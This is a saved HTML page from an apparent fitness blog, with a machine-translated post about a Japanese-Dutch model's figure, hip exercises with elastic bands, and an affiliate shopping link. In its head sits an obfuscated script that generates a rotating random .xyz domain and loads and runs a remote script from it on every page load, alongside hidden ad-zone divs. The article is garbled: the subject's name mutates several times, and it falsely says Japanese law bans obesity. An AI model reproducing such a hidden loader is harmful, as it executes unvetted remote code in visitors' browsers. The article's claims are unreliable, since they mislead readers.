<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Reduced fat,">










<meta name="description" content="Optimistic and diligent people, will always bring us a forward momentum! In this era, fitness has become a popular trend, more and more people use their spare time to do all kinds of sports. Because s">
<meta name="keywords" content="Reduced fat">
<meta property="og:type" content="article">
<meta property="og:title" content="Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans">
<meta property="og:url" content="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/index.html">
<meta property="og:site_name" content="How to Keep Fit">
<meta property="og:description" content="Optimistic and diligent people, will always bring us a forward momentum! In this era, fitness has become a popular trend, more and more people use their spare time to do all kinds of sports. Because s">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/e1607753-faf4-46f5-ba3b-6fdab660577f.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/db41ca4c-472b-4e3c-8159-ea3e678853f6.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/3462deb4-7aa3-4c69-b278-ae1f7b69d911.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/721e9204-089d-4273-b9eb-eca88a863782.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/87d22099-fc8a-4b08-a242-93a476c3e0d0.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/9941588a-a638-47ba-842c-3e4ed71d6c22.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/2086e30a-feee-4e49-9b25-1aae36fceb75.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/039f518a-d777-4ca0-a17c-cfb5ca1f1821.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/000e6424-9fa7-4cad-8d62-797477bd9941.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/0429c36b-77b9-4b8d-94e9-d09fb2a23ec0.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/f7e90563-4e4c-4a41-9752-50c483722254.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/e76a8f06-c3da-4299-904e-24929055761f.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/8679c52a-660a-4747-a8f3-068e25e18b7c.gif">
<meta property="og:updated_time" content="2021-05-06T07:19:25.096Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans">
<meta name="twitter:description" content="Optimistic and diligent people, will always bring us a forward momentum! In this era, fitness has become a popular trend, more and more people use their spare time to do all kinds of sports. Because s">
<meta name="twitter:image" content="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/e1607753-faf4-46f5-ba3b-6fdab660577f.gif">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans | How to Keep Fit</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">How to Keep Fit</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">How to Keep Fit</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>


 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
                            
<div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="15af66dea7db40aeac9404abd8ac7ee3" style="display: none"></div>
<div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="957010872ca54cf98941765c8f125165" style="display: none"></div>
<div class="_fa7cdd4c68507744" data-zone="1f18e43b8b0e495c9b6b7be51eb2c8c2" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>


  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Thomas">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="How to Keep Fit">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2021-03-29T00:00:00+08:00">
                2021-03-29
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>Optimistic and diligent people, will always bring us a forward momentum! In this era, fitness has become a popular trend, more and more people use their spare time to do all kinds of sports. Because sports can not only improve their physical fitness, but also contribute to health.<br><img src="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/e1607753-faf4-46f5-ba3b-6fdab660577f.gif" alt="Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans"><br><img src="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/db41ca4c-472b-4e3c-8159-ea3e678853f6.gif" alt="Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans"><br>In the Chinese aesthetic, beauty is almost synonymous with thin, weight loss has been the pursuit of Chinese women’s life. However, it is not China, but Japan, that values weight most in the world. The ban on obesity has long been recorded in Japanese law. Of course, except for sumo wrestlers, the weight of other Japanese people has long been banned below a standard line.<br><img src="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/3462deb4-7aa3-4c69-b278-ae1f7b69d911.gif" alt="Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans"><br><img src="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/721e9204-089d-4273-b9eb-eca88a863782.gif" alt="Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans"><br>Today’s beauty is Miyagawa Mayer, she is a mixed race, and is a Japanese and Dutch mixed race type. She lived alone in Holland for two years before returning to Japan to live with her mother. She used to work as a model. After unremitting efforts, she finally became an accompanying reporter in the NBA Golden State Warriors team.<br><img src="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/87d22099-fc8a-4b08-a242-93a476c3e0d0.gif" alt="Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans"><br><img src="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/9941588a-a638-47ba-842c-3e4ed71d6c22.gif" alt="Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans"><br>Because of her identity, we can often see her interviewing players on the screen. On the screen, her concave and convex figure instantly attracted everyone’s attention, which also made many fans become her fans.<br><img src="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/2086e30a-feee-4e49-9b25-1aae36fceb75.gif" alt="Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans"><br>It turns out that miyawa Mayer is a super self disciplined person in private. She has been exercising herself all the time. He once won the championship in bodybuilding competition, so he was called “Japan’s first buttock”.<br><img src="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/039f518a-d777-4ca0-a17c-cfb5ca1f1821.gif" alt="Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans"><br>She is a very happy person to share. She often publishes detailed fitness tutorials on the Internet. I hope everyone can have a good exercise. Every time I see her figure, I can always feel her just right sexy. Her appearance with traditional oriental charm can always give people a kind of positive motivation.<br><img src="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/000e6424-9fa7-4cad-8d62-797477bd9941.gif" alt="Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans"><br>In fact, the reason why Gonghe Mayer can keep her figure concave and convex is that her buttocks are very warped. Today, I’d like to share with you some of Gonghe Mayer’s usual hip exercises. She only needs a yoga mat and a set of suitable elastic rings. Come and learn together!<br><strong>Action 1: activate the elastic circle in a mussel way</strong><br><img src="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/0429c36b-77b9-4b8d-94e9-d09fb2a23ec0.gif" alt="Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans"><br><strong>Action tips: * * put the elastic ring above your knees, lie on the yoga mat, slightly bend your legs, lift one leg up, pull up the elastic ring, stop at the top, then slowly put it down to the original position, 20 times in each group, repeat 4 groups.<br>**Action 2: squat with elastic circle</strong><br><img src="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/f7e90563-4e4c-4a41-9752-50c483722254.gif" alt="Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans"><br><strong>Action tips: * * put the elastic hoop above the knee, open the feet naturally, the same width as the hip, tighten the core, keep the waist and back straight, take a breath, then squat, keep the knee in the same line with the toes, keep the body stable, squat until the thigh is parallel to the ground, then exhale and squat, 15 times in each group, repeat 4 groups.<br>**Third, springring lunge</strong><br><img src="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/e76a8f06-c3da-4299-904e-24929055761f.gif" alt="Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans"><br>**Action tips: * put both hands on the waist, elastic hoop on the thigh, keep the body straight, tighten the core, step forward with one leg, then squat, inhale at the same time, at this time, you need to keep the leg vertical to the ground, keep the body straight, and then restore this action, step forward with the other leg, alternate with two legs, one group for 20 times, repeat for 4 groups.<br><img src="http://doumaiy.xyz/2021/03/29/Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans/8679c52a-660a-4747-a8f3-068e25e18b7c.gif" alt="Miyagawa Mayer, the Japanese goddess of buttocks, has a high face and a concave and convex figure, which has attracted many fans"><br>Want to practice with the palace River Mayer the same hip, need to adhere to practice Oh, it is recommended to practice once every other day, so the effect will be better.<br>A lot of kids have yoga mats, but what if they don’t have elastic rings? Here’s a very practical elastic ring for Amway. There are five different colors and different weights. It’s suitable for different people. Many people directly buy a whole set of elastic rings with high cost performance. Different training movements require different weights, so you can use a whole set of different elastic rings.</p>
<p>#pgc-card .pgc-card-href {        text-decoration: none;         outline: none;         display: block;         width: 100%;         height: 100%;    }    # pgc-card .pgc-card- href:hover  {        text-decoration: none;    }    /* PC style * /. PGC card {box sizing: border box; height: 164px;         border: 1px solid #e8e8e8;         position: relative;         padding: 20px 94px 12px 180px;         overflow: hidden;    }    . pgc-card::after {        content: “ “;         display: block;         border-left: 1px solid #e8e8e8;         height: 120px;         position: absolute;         right: 76px;         top: 20px;    }    . pgc-cover {        position: absolute;         width: 162px;         height: 162px;         top: 0;         left: 0;         background-size: cover;    }    . pgc-content {        overflow: hidden;         position: relative;         top: 50%;        - webkit-transform: translateY(-50%);         transform: translateY(-50%);    }    . pgc-content-title {        font-size: 18px;         color: #222;         line-height: 1;         font-weight: bold;         overflow: hidden;         text-overflow: ellipsis;         white-space: nowrap;    }    . pgc-content-desc {        font-size: 14px;         color: #444;         overflow: hidden;         text-overflow: ellipsis;         padding-top: 9px;         overflow: hidden;         line-height: 1.2em;         display: -webkit-inline-box;        - webkit-line-clamp: 2;        - webkit-box-orient: vertical;    }    . pgc-content-price {        font-size: 22px;         color: #f85959;         padding-top: 18px;         line-height: 1em;    }    . pgc-card-buy {        width: 75px;         position: absolute;         right: 0;         top: 50px;         color: #406599;         font-size: 14px;         text-align: center;    }    . pgc-buy-text {        padding-top: 10px;    }    . pgc-icon-buy {        height: 23px;         width: 20px;         display: inline-block;         background: url( <a href="https://s0.pstatp.com/pgc/v2/pgc" target="_blank" rel="noopener">https://s0.pstatp.com/pgc/v2/pgc</a>_ tpl/static/image/commodity_ buy_ f2b4d1a.png);    }<br>[<br>Stretch ring for hip lifting<br>￥29.9<br>purchase<br>]( <a href="https://haohuo.jinritemai.com/views/product/item2" target="_blank" rel="noopener">https://haohuo.jinritemai.com/views/product/item2</a>? id=3432197646616521850&amp; origin_ type=2003002010&amp; origin_ id=6587612064_ 3433157599598631796&amp; alkey=1304_ 6587612064_ 6587612064_ 3433157599598631796_ 011)<br>Conclusion: after reading Miyake Mayer’s article, do you think she is beautiful? Welcome to comment area.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Reduced-fat/" rel="tag"># Reduced fat</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/03/28/Wang Sicong can't win the female anchor, the figure beauty charm is full, in line with the Asian aesthetic/" rel="next" title="Wang Sicong can't win the female anchor, the figure beauty charm is full, in line with the Asian aesthetic">
                <i class="fa fa-chevron-left"></i> Wang Sicong can't win the female anchor, the figure beauty charm is full, in line with the Asian aesthetic
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/03/30/If you want to have a good effect on muscle hypertrophy, don't change the training movements frequently/" rel="prev" title="If you want to have a good effect on muscle hypertrophy, don't change the training movements frequently">
                If you want to have a good effect on muscle hypertrophy, don't change the training movements frequently <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Thomas</p>
              <p class="site-description motion-element" itemprop="description">How to Keep Fit</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">59</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Thomas</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
